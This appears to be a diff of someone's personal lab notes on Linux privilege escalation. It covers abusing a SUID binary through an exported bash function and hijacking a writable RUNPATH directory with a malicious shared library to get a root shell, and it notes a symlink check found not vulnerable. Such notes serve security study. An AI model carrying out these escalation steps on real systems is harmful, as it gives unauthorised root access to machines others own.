sodium410/privesc/linux.md

 export -f /usr/bin/service  //exporting the function as env varia
 //running the suid binary now gives an elevated bash !!
 Question around this -- what's the root cause here ? how define any such calls in suid files ?
+//Another method, check the RUNPATH where libraries can be loaded from - if path is wRitable place a malicious library here
+ldd payroll    //show sthe liraries loaded and its path  //found unusual library wiht path /develpoment
+readelf -d payroll  | grep PATH   //check RUNASPATH -- reveals /development is the custom location from where app can load libraries from firt in order
+ls -la /development  //reveals path is writable
+cp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so  //copy the same named libary to /development and run app
+./payroll  //running from development throws an error undefined symbol: dbquery  -- so its looking for function dbquery.
+//priv.c rename the function and place it here
+./payroll   //now should give elevated shell by running malicious function library file

 #### Escalation via Binary Symlinks
 one of the tests, cron jobs had a symlink run by root - not vulnerable, as symlink dire was not writable